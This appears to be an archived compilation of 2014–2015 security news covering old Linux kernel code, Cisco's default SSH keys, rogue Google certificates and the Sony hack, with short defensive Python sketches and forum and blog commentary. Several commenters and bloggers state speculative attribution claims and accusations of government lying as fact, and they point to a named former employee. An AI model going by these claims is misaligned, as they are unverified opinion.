6. The kernel has roughly 19 million lines of code, and over 3 million lines haven't been touched in 10 years. The problem with old, unmaintained code is that it tends to harbor some really old bugs. "We have millions of systems out there running Linux and millions of people relying on security of a system on which the Linux kernel is the base," Corbet said. "If we're not going to let those people down, we need to be more serious about security."

7. The year 2038 problem - the year the 32-bit time_t value runs out of bits in the kernel's existing time format - needs to be fixed sooner rather than later. The core timekeeping code of the kernel was fixed in 2014 – the other layers of the kernel will take more work.

8. The Linux kernel is getting bigger with each version and currently uses 1 MB of memory. That's too big to support devices built for the Internet of Things. The kernel tinification effort is re-thinking the traditional Linux kernel, for example getting rid of the concept of users and groups in the kernel, but it faces some resistance. "We can't just count on the dominance of Linux in this area unless we earn it" by addressing the needs of much smaller systems, Corbet said.

9. Live kernel patching is coming to the mainline kernel this year.

10. The kdbus subsystem development - an addition coming in 2015 that will help make distributed computing more secure - has been a model of how kernel development should work.
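
The year-2038 limit in item 7 is easy to demonstrate: a signed 32-bit time_t counts seconds since 1970-01-01 UTC and tops out at 2**31 - 1, after which it wraps negative. A small Python sketch:

```python
#!/usr/bin/env python3
"""Sketch: the 2038 problem in one computation. A signed 32-bit time_t
runs out at 2**31 - 1 seconds after the 1970 epoch."""

from datetime import datetime, timedelta, timezone

EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)
T_MAX_32BIT = 2**31 - 1  # 2147483647

def utc(ts):
    """UTC datetime for a seconds-since-epoch value (handles negatives)."""
    return EPOCH + timedelta(seconds=ts)

# Last representable second: 2038-01-19 03:14:07 UTC
print(utc(T_MAX_32BIT))
# One tick later a 32-bit counter wraps to -2**31: 1901-12-13 20:45:52 UTC
print(utc(-2**31))
```

This is why the fix cannot stop at the core timekeeping code: every on-disk format, syscall, and driver that stores a 32-bit seconds value has the same cliff.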

 

[Oct 14, 2015] Security farce at Datto Inc that held Hillary Clinton's emails revealed

[Jun 27, 2015]  Cisco Security Appliances Found To Have Default SSH Keys

June 26, 2015 | Slashdot | Soulskill
Trailrunner7 writes: Many Cisco security appliances contain default, authorized SSH keys that can allow an attacker to connect to an appliance and take almost any action he chooses. The company said all of its Web Security Virtual Appliances, Email Security Virtual Appliances, and Content Security Management Virtual Appliances are affected by the vulnerability.

This bug is about as serious as they come for enterprises. An attacker who is able to discover the default SSH key would have virtually free rein on vulnerable boxes; given Cisco's market share and presence in the enterprise worldwide, that is likely a large number. The default key apparently was inserted into the software for support reasons.

"The vulnerability is due to the presence of a default authorized SSH key that is shared across all the installations of WSAv, ESAv, and SMAv. An attacker could exploit this vulnerability by obtaining the SSH private key and using it to connect to any WSAv, ESAv, or SMAv. An exploit could allow the attacker to access the system with the privileges of the root user," Cisco said.
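
One way to sweep a fleet for a shared key like this is to compare the SSH public-key fingerprints found in authorized_keys files against a known-bad list from the vendor advisory. A Python sketch: the fingerprint format matches `ssh-keygen -lf` output, and the key material in the example is a placeholder, not Cisco's actual key (the real remediation is Cisco's patch, which regenerates the keys).

```python
#!/usr/bin/env python3
"""Sketch: compute OpenSSH-style SHA256 fingerprints of public keys so
authorized_keys files can be checked against a known-bad list."""

import base64
import hashlib

def sha256_fingerprint(pubkey_line):
    """Return 'SHA256:...' for an authorized_keys/id_*.pub line of the form
    'ssh-rsa AAAA... comment', matching `ssh-keygen -lf` output."""
    blob = base64.b64decode(pubkey_line.split()[1])
    digest = hashlib.sha256(blob).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")

def find_bad_keys(authorized_keys_text, bad_fingerprints):
    """Return the lines whose fingerprint appears on the known-bad list."""
    return [line for line in authorized_keys_text.splitlines()
            if line.strip() and not line.startswith("#")
            and sha256_fingerprint(line) in bad_fingerprints]
```

The same routine works for auditing any shared or leaked key, since the fingerprint is derived solely from the public blob.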

[Jun 02, 2015] Sony Hack: Clooney Says Movie is about Snowden, Not Journalism

Dec 22, 2014 | The Intercept

A draft of the release was sent to a senior executive in Sony’s Government Affairs office, Keith Weaver, who offered a few “concerns/edits” before they were sent to Greenwald. Weaver was concerned about how Sony described U.S. government spying. Weaver wrote:

1. In the first sentence of the second paragraph – delete the phrase “illegal spying” and either it [sic] simply as “operations” or replace it with “intelligence gathering” — so the clause would read “U.S. government’s intelligence gathering operations.”

2. In the second sentence of the second paragraph — delete the “phrase misuse of power” and replace it with “actions” or “activities” so that it would read “The NSA’s actions” or “the NSA’S activities.”

Weaver was also concerned about how the draft quoted Greenwald as saying, “Growing up, I was heavily influenced by political films, and am excited about the opportunity to be a part of a political film that will resonate with today’s moviegoers.” Weaver, who would go on to be a key figure in the damage control team on Sony’s The Interview, wondered in the same email whether Sony wanted Greenwald to describe it as a “political film.”

“That’s really more of PR point so up to you guys — and I suspect since it is his own quote Greeenwald will feel strongly,” the Sony executive wrote.

The final version of the press release took Weaver’s suggestions on toning down the language on NSA, but let Greenwald’s quote stand (Greenwald, when asked about the emails, says he was “unaware, but am not surprised, that an internal Sony lobbyist diluted the press release draft in order to avoid upsetting the government.”)

[Dec 07, 2015]  Google Hit Again by Unauthorized SSL-TLS Certificates

eSecurity Planet

The SSL/TLS certificate authority system's frailty is again exposed, as an unauthorized certificate is issued for Google.

The purpose of an SSL/TLS digital certificate is to provide a degree of authenticity and integrity to an encrypted connection. The SSL/TLS certificate helps users positively identify sites, but what happens when a certificate is wrongly issued? Just ask Google, which has more experience than most in dealing with this issue.

On March 23 Google reported that unauthorized certificates for Google domains were issued by MCS Holdings, which is an intermediate certificate authority under CNNIC. Because CNNIC is a trusted CA that is included in every major Web browser, the certificate might have been trusted by default, even though it wasn't legitimate.

Google, thanks to its own past experience, leverages HTTP public key pinning (HPKP) in Chrome and Firefox. With HPKP, sites can "pin" certificates that they will allow. As such, fraudulent certificates not pinned by Google would not be accepted as authentic.

Browsers that don't support HPKP in the same way, including Apple Safari and Microsoft Internet Explorer, might have been potentially tricked by the fraudulent certificates, however.
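
For reference, a pin value in this scheme is just base64(SHA-256(SPKI DER)), i.e. a hash of the certificate's SubjectPublicKeyInfo rather than of the whole certificate. A sketch of deriving the pin and assembling the RFC 7469 Public-Key-Pins header (extracting the SPKI DER from a certificate is left to openssl, e.g. `openssl x509 -pubkey | openssl pkey -pubin -outform DER`):

```python
#!/usr/bin/env python3
"""Sketch: deriving an HPKP pin-sha256 value and building the RFC 7469
header. Input is the DER-encoded SubjectPublicKeyInfo as bytes."""

import base64
import hashlib

def pin_sha256(spki_der):
    """Return the pin-sha256 value: base64(SHA-256(SPKI DER))."""
    return base64.b64encode(hashlib.sha256(spki_der).digest()).decode()

def hpkp_header(primary_spki, backup_spki, max_age=5184000):
    """Assemble a Public-Key-Pins header; RFC 7469 requires at least one
    backup pin so a lost key does not brick the site for pinned clients."""
    return ('Public-Key-Pins: pin-sha256="%s"; pin-sha256="%s"; max-age=%d'
            % (pin_sha256(primary_spki), pin_sha256(backup_spki), max_age))
```

Because the pin covers the public key rather than the certificate, a site can rotate certificates freely as long as the underlying key pair (or the pinned CA key) stays the same, which is how Google's preloaded pins survived the MCS Holdings incident.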

 

[Dec 27, 2014] FBI Warned a Year Ago of Impending Malware Attacks—But Didn't Share Info with Sony

Multiple sources familiar with the report and with FBI distribution channels said Sony would have seen it only if members of its IT department belonged to Infragard, the voluntary organization that also received the report.
https://firstlook.org/theintercept/2014/12/24/fbi-warning/

Nearly one year before Sony was hacked, the FBI warned that U.S. companies were facing potentially crippling data destruction malware attacks, and predicted that such a hack could cause irreparable harm to a firm’s reputation, or even spell the end of the company entirely.  The FBI also detailed specific guidance for U.S. companies to follow to prepare and plan for such an attack.

But the FBI never sent Sony the report.

The Dec. 13, 2013 FBI Intelligence Assessment, “Potential Impacts of a Data-Destruction Malware Attack on a U.S. Critical Infrastructure Company’s Network,” warned that companies “must become prepared for the increasing possibility they could become victim to a data destruction cyber attack.”

The 16-page report includes details on previous malware attacks on South Korean banking and media companies—the same incidents and characteristics the FBI said Dec. 19th that it had used to conclude that North Korea was behind the Sony attack.

The report, a copy of which was obtained by The Intercept, was based on discussions with private industry representatives and was prepared after the 2012 cyber attack on Saudi Aramco.  The report was marked For Official Use Only, and has not been previously released.

In it, the FBI warned, “In the current cyber climate, the FBI speculates it is not a question of if a U.S. company will experience an attempted data-destruction attack, but when and which company will fall victim.”

The detailed warning raises new questions about how prepared Sony should have been for the December hack, which resulted in terabytes of commercial and personal data being stolen or released on the internet, including sensitive company emails and employee medical and personal data. Multiple sources told The Intercept that the December 2013 report raises new questions about what Sony—which is considered by the U.S. government as part of “critical infrastructure”—did or did not do to secure its systems in the year before the cyber attack.

Earlier this month, the FBI formally accused North Korea of being behind the Sony hack. “Technical analysis of the data deletion malware used in this attack revealed links to other malware that the FBI knows North Korean actors previously developed,“ the Dec. 19th FBI press release said. “For example, there were similarities in specific lines of code, encryption algorithms, data deletion methods, and compromised networks.”

The FBI also recently referred to specific evidence they say led them to determine North Korea’s involvement, including the use of the same infrastructure, IP addresses, and similarities between the Sony attack and last year’s attack against South Korean businesses and media.

North Korea has repeatedly denied involvement in the Sony cyber attack.

The FBI warning from December 2013 focuses on the same type of data destruction malware attack that Sony fell victim to nearly a year later.  The report questions whether industry was overly optimistic about recovering from such an attack and notes that some companies “wondered whether [a malware attack] could have a more significant destructive impact: the failure of the company.”

In fact, the 2013 report contains a nearly identical description of the attacks detailed in the recent FBI release. “The malware used deleted just enough data to make the machines unusable; the malware was specifically written for Korean targets, and checked for Korean antivirus products to disable,” the Dec. 2013 report said. “The malware attack on South Korean companies defaced the machine with a message from the ‘WhoIs Team.’”

Sony did not respond to The Intercept’s questions about whether they had received the report, but the FBI  confirmed that Sony was not on the distribution list. “The FBI did not provide it directly to them,” FBI spokesman Paul Bresson told The Intercept. “It was provided to several of our outreach components for dissemination as appropriate.”

Multiple sources familiar with the report and with FBI distribution channels said Sony would have seen it only if members of its IT department belonged to Infragard, the voluntary organization that also received the report.

The report obtained by The Intercept includes pages of check-lists and step-by step guidance for U.S. companies on how to prepare for, mitigate and recover from the same exact type of hack that hit Sony.  Those sorts of “best practices” are critical for companies trying to fend off cases like the Sony attack, Kurt Baumgartner, Principal Security Researcher at Kaspersky Lab, told The Intercept.

Sony was “not adequately following best practices for a company of its size and sector,” Baumgartner said. “The most obvious, had they followed netflow monitoring recommendations, they would have noticed the outbound exfiltration of terabytes of data.”

Had Sony gotten the FBI report, they also would have received specific guidance prepared by the Department of Homeland Security Industrial Control Systems Cyber Emergency Response Team for preparation and planning for a successful destructive malware attack.  Sources familiar with the 2013 report believe if Sony had followed these guidelines the effects of the cyber attack would have been far less severe.

The real question, then, is whether more could have been done to prevent the Sony hack, and if so, what. "Korean data was available since then—nobody really paid any attention to it," a source within the information security industry told The Intercept.

“The question is, who dropped the ball?” the source said. “Was the information in this report not shared or was information ignored?”

Photo: Nick Ut/AP

[Dec 26, 2014]  Did North Korea Really Attack Sony? 

An anonymous reader writes "Many security experts remain skeptical of North Korea's involvement in the recent Sony hacks. Schneier writes: "Clues in the hackers' attack code seem to point in all directions at once. The FBI points to reused code from previous attacks associated with North Korea, as well as similarities in the networks used to launch the attacks. Korean language in the code also suggests a Korean origin, though not necessarily a North Korean one, since North Koreans use a unique dialect. However you read it, this sort of evidence is circumstantial at best. It's easy to fake, and it's even easier to interpret it incorrectly. In general, it's a situation that rapidly devolves into storytelling, where analysts pick bits and pieces of the "evidence" to suit the narrative they already have worked out in their heads.""

BitterOak (537666) on Wednesday December 24, 2014 @06:21PM (#48670061)

I was suspicious from the moment they denied it. (Score:5, Insightful)

I was suspicious of the U.S. allegations that the North Korean government was behind it when the North Koreans denied it was them. If you're going to hack somebody to make a political statement, it makes no sense to later deny that you were involved. Someone might be trying to make it look like North Korea, but I seriously doubt they were directly involved in this.

Rei (128717) on Wednesday December 24, 2014 @06:24PM (#48670077) Homepage

Right. (Score:3)

Because the world is just full of people who would hack a company to blackmail them not to release a movie about Kim Jong Un. Because everyone loves the Great Leader! His family's personality cult^H^H^H^H^H^H^H^H^H^H^H^H^H^H^H^HVoluntary Praise Actions only take up about 1/3rd of the North Korean budget. And I mean, they totally deserve it. I mean, did you know that his father was the world's greatest golf player who never had to defecate and whose birth was fortold by a swallow and heralded by a new star in the sky?

No, of course it wasn't North Korea. Clearly it was the work of America! Because America wants nothing more than a conflict with North Korea right now. Because clearly Russia and Syria and ISIS aren't enough, no, the US obviously has nothing better to do than to try to stir up things out of the blue with the Hollywood obsessed leader of a cult state whose family has gone so far as to kidnap filmmakers and force them to make movies for him. It all just makes so damn much sense!

Cue the conspiracy theorists in three, two, one...

Anonymous Coward on Wednesday December 24, 2014 @06:26PM (#48670085)

Shakey evidence hasn't stopped the US government (Score:2, Insightful)

Removing the government, destabilising the region and killing hundreds of thousands of civilians based solely on circumstantial evidence isn't exactly new to the US government, i'm sure they don't really care who was truly responsible.

arth1 (260657) on Wednesday December 24, 2014 @07:45PM (#48670469) Homepage Journal

Re: Shakey evidence hasn't stopped the US governme (Score:4, Interesting)

There is, however, possibly the world's largest repositories of rare earth metals [wikipedia.org].

dltaylor (7510) on Wednesday December 24, 2014 @06:29PM (#48670097)

not really likely (Score:5, Interesting)

NK denied it, rather than taking credit.

Their tools are widely distributed, so faking the source is really easy.

The US government is weird combination of ineptitude and self-aggrandizement, so the FBI claims are likely pure BS designed to make the claimants look good (they were SOOO sure that had profiled the Yosemite killer years ago that it only took two more deaths to prove them wrong).

Greyfox (87712) on Wednesday December 24, 2014 @06:29PM (#48670099) Homepage Journal

To What End? (Score:2)

So what's the motive then? Plain ol' extortion, or are they trying to distract the media from the CIA torture story that came out about the same time? If it's the latter, it did a good job -- the media and public seem to have the attention span of a two-year-old.

MichaelSmith (789609) on Wednesday December 24, 2014 @06:38PM (#48670151) Homepage Journal

Re:To What End? (Score:5, Informative)

The same article over at boing boing suggested that a sacked ex employee had released the files.

Okian Warrior (537106) on Wednesday December 24, 2014 @06:39PM (#48670153) Homepage Journal

Wait - what? (Score:5, Insightful)

The FBI points to reused code from previous attacks associated with North Korea [...]

Um... I hate to be the non-technical person that points this out, but...

The evidence that implicates NK on the previous attacks - is it the same evidence used to assign blame in the current attack?

Is this citing the conclusions based on the same evidence/situation from previous attacks to give legitimacy to the evidence in the current attack?

What a scam! Claim something on flimsy evidence, then cite those claims to give legitimacy to the flimsy evidence!

I wonder... can I do this sort of thing in the scientific literature? Hmmmm...

jd.schmidt (919212) on Wednesday December 24, 2014 @07:29PM (#48670401)

If NK did it, explain this one.. (Score:5, Informative)

So I hear it was an inside job; how did NK get a spy infiltrated into Sony so quickly? Does NK really have that many spy assets all over the U.S. that they can whistle up as needed? Or was this an elaborate operation set up when the movie was first announced, in which they managed to infiltrate a NK citizen into Sony Pictures in the time it took to make the movie? How does this all actually go down? FYI, NK is pretty computer-illiterate overall compared to most countries, and nearly every country on the planet is better positioned than NK to pull this stunt off, along with a whole bunch of independent yahoos.

Unless there is a U.S.-born traitor working for NK, it seems the possible suspects could be narrowed down pretty quickly. I am NOT saying NK was framed, but I AM saying there are a lot of people out there who do stuff for reasons I wouldn't, and more real data is needed.

kencurry (471519) on Wednesday December 24, 2014 @07:46PM (#48670481)

So much wrong here (Score:5, Insightful)

1) No concrete evidence that a sovereign country hacked into Sony, but POTUS says he thinks they did anyways

2) Movie is probably total piece of sh*t anyways, who cares?

3) Even if NK did it, it is not an attack on the US but on a foreign corp with some US holdings; Sony is still a Japanese company, so why don't they saber-rattle instead of us?

4) The whole thing could have been a PR stunt from Sony to advertise the movie

5) Why didn't POTUS just tell Sony "get your sh*t together, improve your security - tired of this crap, dayum!"

Eternal Vigilance (573501) on Wednesday December 24, 2014 @08:00PM (#48670543)

The NK story was cover to protect Sony (and NSA) (Score:5, Insightful)

Of course North Korea didn't attack Sony. Asking "Did North Korea really attack Sony?" is like asking "Does NORAD really track Santa?"

The North Korea story was spin to save Sony from the devastating bad publicity about the depths of their business and technological incompetence. (The politicians who defended them will get repaid for this favor during the next election cycle. My previous comment about this from last week: They may even start using this to try to rescue that disaster of a movie. "You have to see 'The Interview'! To support free speech and America!" [slashdot.org])

The Dear Leader Of The Free World announcing "don't blame poor Sony, they were helpless victims of the evil North Koreans" totally changed the media story, saving Sony huge $$$ in both public perception and future lawsuits.

But just how America's President and trillion-dollar national security state could get things so wrong - but should always be trusted when saying who's bad and deserves to be killed, like some kind of psycho-Santa delivering death from his sleigh filled with drones - will never be questioned.

Businesses and politicians will never stop lying when it works this well.

Merry Christmas.

fremsley471 (792813) on Wednesday December 24, 2014 @06:56PM (#48670245)

Re:Occam's Razor (Score:5, Insightful)

No, Occam's Razor says the simplest answer is most likely true. The OP didn't go on a flight of fantasy, you did. A nation state hacks a corporation, with possible major diplomatic consequences, over a B-movie? Pull the other one, it's got WMDs on it.

arth1 (260657) on Wednesday December 24, 2014 @07:03PM (#48670287) Homepage Journal

Re:Occam's Razor (Score:5, Insightful)

I do not think you know what Occam's razor is. It does not mean you need conclusive evidence to believe in something. It means the simplest explanation tends to be the best one, other things being equal.

Actually, that's not what it says. It says that plurality is not to be posited without necessity, i.e. don't add complexity to reach a conclusion if it can be reached without adding it.

The simplest solution here isn't that it's North Korea acting based on an unreleased movie they probably hadn't even heard of before this whole debacle, displaying hacking skills not seen before, and then denying it.

Much simpler solutions could be disgruntled former employees or someone doing it for the lulz. It's not like Sony hasn't been a magnet for the latter, with all the previous hacks.

In any case, unless the three letter agencies are withholding crucial information, there's not enough to go on here to point the fingers at Kim Jong-Un. I'm sure there are people who would blame him no matter what, because frankly he's an asshole of Goatse dimensions, but the evidence needs to be far more solid than this.

rwa2 (4391) * on Wednesday December 24, 2014 @08:22PM (#48670617) Homepage Journal

Re:Occam's Razor - PR stunt (Score:3)

Yeah, I'm with you here. I'm sure it's more likely that this is a PR stunt gone wild and we all fell for it. Even the POTUS fell for it. Before this, I hadn't even heard of the studio, much less the movie.

Let's see...

suckers :P

abirdman (557790) * <abirdman&maine,rr,com> on Wednesday December 24, 2014 @09:18PM (#48670795) Homepage Journal

Re:Occam's Razor - PR stunt (Score:2)

Also, there have been no reviews of the film, either positive or negative. For a movie that looked as bad as the one shown in the previews I saw, this could be what saves the box office. I can see no possible advantage for NK in investing the resources to hack Sony over a second-rate comic movie. Who would get an advantage from the Sony hack? I'll bet a lot of Symantec licenses will be renewed before the end of the year. Sorry, just free-associating here. If I had mod points you'd get an insightful.

smaddox (928261) on Wednesday December 24, 2014 @07:51PM (#48670503)

Re: Occam's Razor (Score:2)

Your objections are easily explained away as a false flag operation initiated by an individual or group.

jrumney (197329) on Wednesday December 24, 2014 @09:34PM (#48670883) Homepage

Re:Occam's Razor (Score:2)

In order to say CIA hacked Sony, you would have to invent all sorts of motives and cover-up to explain it. The simpler explanation is that N. Korea did it, because the circumstances and evidence so far all point to it.

You mean the motives and cover-up the media has so far invented all point to it. An even simpler explanation is that disgruntled hacker groups reused some attack code, perhaps from an attack on South Korean companies a few weeks back which maybe North Korea paid them to deploy.

The narrative about The Interview being the motivation for the attack didn't come out until long after the attacks, and was initially denied by the contacts the media had made; it was only a few days later that statements from the supposed hackers started mentioning it. This was likely after the disgruntled hackers realized that it made a better back story than the fact that they were just being assholes, and would likely deflect law enforcement attention away from them if it became widely believed.

[Dec 24, 2014]  Sony Hack - Likely Inside Attacker Found - Obama Claim Discredited

"...It follows the pattern. In 2002, when the U.S. broke the Geneva agreement which froze the North Korean nuclear program, the US accused North Korea of secretly engaging in uranium enrichment."
"...The whole purpose of the demonization in the MSM of North Korea is to justify the Asian pivot, which is actually about containment of China. The establishment believes it best to not tell the "useful idiots" in the general population so they're using North Korea so as to "protect" the clueless public."
"...P2Asia promised 60:40% realignment to Pacific Theater, from current 40:60%, but (in writing) without Atlantic Theater reduction in forces. No base closures. No redeployments. Pure Mil.Gov Stage 5 Metastasis, from 40:60% to 90:60% as it were, the greatest expansion since the Cold War, and Ukraine:Syria was just an Atlanticist chess move to ensure this will be massive. The only thing the US produces today is bad cars, and military and financial weapons of mass destruction. The Cheneyites will ensure the P2Asia $100sBs all get looted away on IDIQNB contracts. The Gang of Eight 40,000,000 'Blue Visa' Immigration Service Class Bill actually stated in the legislation 'No Bid', together with a New Federal Secret Police, and Rendition SuperMax Prisons in every State. Together with McHealthcare, McEducation, McWar and McPrisons"
"..."Cui bono? Who benefits from framing North Korea?" The same people who will benefit or who did benefit from framing Serbia, Russia, Syria, Iran, or Libya ? Just a guess."
Moon of Alabama

The U.S. claims, with zero reliable evidence, that Sony was hacked by North Korea. The NYT editors believed that Weapon of Mass Destruction claim and called for action against North Korea. MoA, like others, seriously doubted the story the Obama regime told:

The tools to hack the company are well known and in the public domain. The company, Sony, had lousy internal network security and had been hacked before. The hackers probably had some inside knowledge. They used servers in Bolivia, China and South Korea to infiltrate. There is zero public evidence that the hack was state-sponsored.

Later "explanation" of the "evidence" by the FBI was unconvincing. Now a serious security company claims to have identified the real hacker:

Kurt Stammberger, a senior vice president with cybersecurity firm Norse, told CBS News his company has data that casts doubt on some of the FBI's findings.

"Sony was not just hacked, this is a company that was essentially nuked from the inside," said Stammberger.
...
"We are very confident that this was not an attack master-minded by North Korea and that insiders were key to the implementation of one of the most devastating attacks in history," said Stammberger.

He says Norse data is pointing towards a woman who calls herself "Lena" and claims to be connected with the so-called "Guardians of Peace" hacking group. Norse believes it's identified this woman as someone who worked at Sony in Los Angeles for ten years until leaving the company this past May.

"This woman was in precisely the right position and had the deep technical background she would need to locate the specific servers that were compromised," Stammberger told me.

The piece also points out that the original demand by the hackers was for money and had nothing to do with an unfunny Sony movie that depicts the murder of the head of a nation state.

Attributing cyber-attacks, if possible at all, is a difficult process which usually ends with uncertain conclusions. Without further evidence it will often be wrong.

That a person has now been identified who had the insider knowledge and possibly a motive for the hack, and who has no connection to North Korea, makes the Obama administration's claim of North Korean "guilt" even less reliable.

It now seems likely that Obama, to start a conflict with North Korea, just lied about the "evidence" like the Bush administration lied about "Saddam's WMD". The NYT editors were, in both cases, childishly gullible or complicit in the crime. 

Puppet Master | Dec 24, 2014 3:43:16 AM | 1

It follows the pattern. In 2002, when the U.S. broke the Geneva agreement which froze the North Korean nuclear program, the US accused North Korea of secretly engaging in uranium enrichment.

It turned out that the intelligence the US had about it was less than certain.

http://www.nytimes.com/2007/03/01/washington/01korea.html?pagewanted=print&_r=0

March 1, 2007
U.S. Had Doubts on North Korean Uranium Drive

The public revelation of the intelligence agencies’ doubts, which have been brewing for some time, came almost by happenstance. In a little-noticed exchange on Tuesday at a hearing at the Senate Armed Services Committee, Joseph DeTrani, a longtime intelligence official, told Senator Jack Reed of Rhode Island that “we still have confidence that the program is in existence — at the mid-confidence level.” Under the intelligence agencies’ own definitions, that level “means the information is interpreted in various ways, we have alternative views” or it is not fully corroborated.

Too late. North Korea had already conducted its first nuclear weapon test, in 2006.

All the lies and ploys served to force North Korea into developing nuclear weapons, which was exactly what the neocons wanted.

http://www.washingtonpost.com/wp-dyn/content/article/2006/10/21/AR2006102100296.html

At many points, the United States found itself at odds with other partners in the six-party process, such as China and South Korea, which repeatedly urged the Bush administration to show more flexibility in its tactics. Meanwhile, administration officials were often divided on North Korea policy, with some wanting to engage the country and others wanting to isolate it.

Before North Korea announced it had detonated a nuclear device, some senior officials even said they were quietly rooting for a test, believing that would finally clarify the debate within the administration.

Why do they do that? It is not about North Korea; it is about catching China.

North Korea is just a trap the US has been carefully preparing for a long time to catch China, by maintaining a crisis spot on Chinese border, and keeping South Korea and Japan in the US orbit and away from China.

For the US, North Korea plays the same geopolitical role as Ukraine. As Ukraine is a geopolitical wedge between Russia and Europe, North Korea is the geopolitical wedge between China and Japan.

One good thing now is that their ploy is becoming more transparent and unraveling more quickly.

P Walker | Dec 24, 2014 10:16:59 AM | 8

The whole purpose of the demonization in the MSM of North Korea is to justify the Asian pivot, which is actually about containment of China. The establishment believes it best to not tell the "useful idiots" in the general population so they're using North Korea so as to "protect" the clueless public.

Chip Nihk | Dec 24, 2014 6:34:03 PM | 10

It goes a little deeper.

P2Asia promised 60:40% realignment to Pacific Theater, from current 40:60%, but (in writing) without Atlantic Theater reduction in forces. No base closures. No redeployments. Pure Mil.Gov Stage 5 Metastasis, from 40:60% to 90:60% as it were, the greatest expansion since the Cold War, and Ukraine:Syria was just an Atlanticist chess move to ensure this will be massive. The only thing the US produces today is bad cars, and military and financial weapons of mass destruction. The Cheneyites will ensure the P2Asia $100sBs all get looted away on IDIQNB contracts. The Gang of Eight 40,000,000 'Blue Visa' Immigration Service Class Bill actually stated in the legislation 'No Bid', together with a New Federal Secret Police, and Rendition SuperMax Prisons in every State. Together with McHealthcare, McEducation, McWar and McPrisons

nomas | Dec 24, 2014 7:36:18 PM | 11

Obama, along with the rest of the U.S. executive and State apparatus, are, by all the evidence, pathological liars.

nomas | Dec 24, 2014 7:46:28 PM | 14

@ anon @ 4

"Cui bono? Who benefits from framing North Korea?"

The same people who will benefit or who did benefit from framing Serbia, Russia, Syria, Iran, or Libya ? Just a guess.

[Nov 02, 2014] Russian Hackers Are Fiendishly Smart. Good Thing For America They’re So Stupid

Talleyrand used to say "A married man with a family will do anything for money". This is especially true about some security company employees...
Oct 29, 2014 | http://marknesop.wordpress.com

Anyway, before we range too far afield to find our way back, let’s look at the Wall Street Journal article. Just keep in the back of your mind that the “experts” who say the trail leads straight back to the Russian government might well be a couple of college dropouts who spend the rest of their time playing World Of Warcraft.

Security wizards FireEye, a cybersecurity firm based in California, discovered “a sophisticated cyberweapon, able to evade detection and hop between computers walled off from the Internet” in a U.S. system. This brilliant piece of sleuthware, we further learn, “was programmed on Russian-language machines and built during working hours in Moscow.”

Stupid, stupid Russians. They went to all the trouble to bore and stroke that baby until it was humming with super-secret code power, and then pointed a trail right back to the Rodina by writing their code in Cyrillic. And, moreover, betrayed themselves even more convincingly by writing all this code during working hours in Moscow. Or Amman, Jordan, which shares the same time zone. Or Baghdad. Or Damascus, or Dar es Salaam. Djibouti. Nairobi. Simferopol. Or perhaps the code was written by somebody outside working hours. Is there some evidence that compelled investigators to think the work of writing spy code has to be done between the hours of 9:00 AM and 5:00 PM?

Their confidential report is due to be released Tuesday, so I guess we’ll have to wait to find out. Oh, wait – no, we won’t, because they told the Wall Street Journal (the world’s biggest fucking blabbermouths), and they posted a link to it. They’re calling this mysterious group “APT-28”. Because “Dirty Moskali Masterminded By Putin”, while it looked great on the cover, cost more to print – and we all have to think about costs these days – and sort of lacked the techno-wallop they were looking for.

I don’t want to spoil the report for you, because it is a ripping read, but I have to say up front that a lot of the circumstantial evidence which causes FireEye to blame this snooping on Russia is summed up in an assessment by one of their managers – a former Russia analyst for the U.S. Department of Defense, by a wonderful coincidence: “Who else benefits from this? It just looks so much like something that comes from Russia that we can’t avoid the conclusion.”

I see. Well, by God, that is evidence, no denying that. It just looks like Russia. Probably because they were stupid enough to code in Cyrillic, even though almost everyone codes in English regardless of where they’re from because almost all programming languages are in English, because most popular frameworks and third-party extensions are written in English, because Cyrillic characters are not allowed when naming many functions and variables, and….gee, I’m sure there was something else….oh, yeah: and because using Cyrillic would be a dead giveaway that the source was Russian, and it would be indescribably stupid to write brilliant code that it would take a top-notch security hired gun to find, and then leave the root code in Cyrillic. The article is at pains to imply the Russians are the world’s most clever hackers. Sure hope they don’t find out how stupid it is to write their code in Russian, or they might really start achieving some success.

But this sneaky program was written during working hours in Moscow, and the information it sought to exploit would only be of interest to the Russian government; that’s how FireEye broke the whole thing wide open, and they’ve been onto the Russians for seven years, ever since they prefaced their invasion of Georgia with a cyber-attack on Georgia’s systems, and ultimately made Saakashvili eat his tie.

Hey, I can think of somebody else who is interested in as much information as it can get on U.S. governmental inner workings, policymaking and current financial situation. Israel. And what do you know? Jerusalem is only an hour off of Moscow time. I’m not suggesting it must have been Israel instead of Russia – perish the thought. But I hope I have adequately expressed my contempt for the doughheaded theory that it must have been Moscow because sneaky writers of dirty code adhere to regular office hours. Just sayin’.

Incidentally, the United States Foreign Agent Registration Act (FARA) has never been enforced against Israel, and in 2012 an amendment was introduced which (paraphrased) reads “The Attorney General may, by regulation, provide for the exemption..[if the AG] determines that such registration…is not necessary…”

After all, Israel has a long and colourful history of spying on the United States. In the early 80’s the FBI investigated AIPAC for long-running espionage and theft of government documents relating to the United States – Israel Free Trade Pact: because Israel had a purloined copy of the USA’s negotiating positions, the story goes, the USA was unable to exploit anything to its advantage because the Israelis already knew what the Americans would concede under pressure: “A quarter-century after the tainted negotiations led to passage of the US-Israel preferential trade pact, it remains the most unfavourable of all U.S. bilateral trade agreements, producing chronic deficits, lack of U.S. market access to Israel and ongoing theft of U.S. intellectual property.”

Defense department stuff? Sure, they were interested in that, too. In 2005 Larry Franklin, Steven Rosen and Keith Weissman were indicted in Virginia for passing classified documents to a foreign power (Israel, although they danced around who it was by referring to it as simply “a Middle Eastern Country”) which were tremendously useful to Israel in its attempts to maneuver the USA into war with Iran on its behalf. Franklin pleaded guilty and received a 12-year prison sentence which was later – incredibly – reduced to 100 hours of community service and 10 months in a halfway house. All charges against Rosen and Weissman, lobbyists for AIPAC, were dropped in 2009. The United States government claimed it did not want classified material revealed at trial. So dangerous, not to put too fine a point on it, that it was better to let the criminals who had given that classified information to a foreign power go free without punishment than to risk it being learned by Americans who had no need to know.

Nor was that the only instance. Jonathan Pollard, an analyst with U.S. Naval Intelligence Command, was convicted of spying for Israel and sentenced to life imprisonment. That sentence has waffled back and forth, largely due to intense efforts by agencies of the Israeli government to get it commuted, and currently stands at release just about a year from now. Israel acknowledged that Pollard had spied for that country on its ally in a formal apology, and the Victim Impact Statement hints that the information which was passed endangered both American lives and the USA’s relations with its Arab allies. Details were never made public, and remain classified. However, as the referenced article points out, Israel today enjoys real-time intelligence sharing with the USA, so I guess spying on America is not really all that important after all – what’s FireEye ki-yiing about?

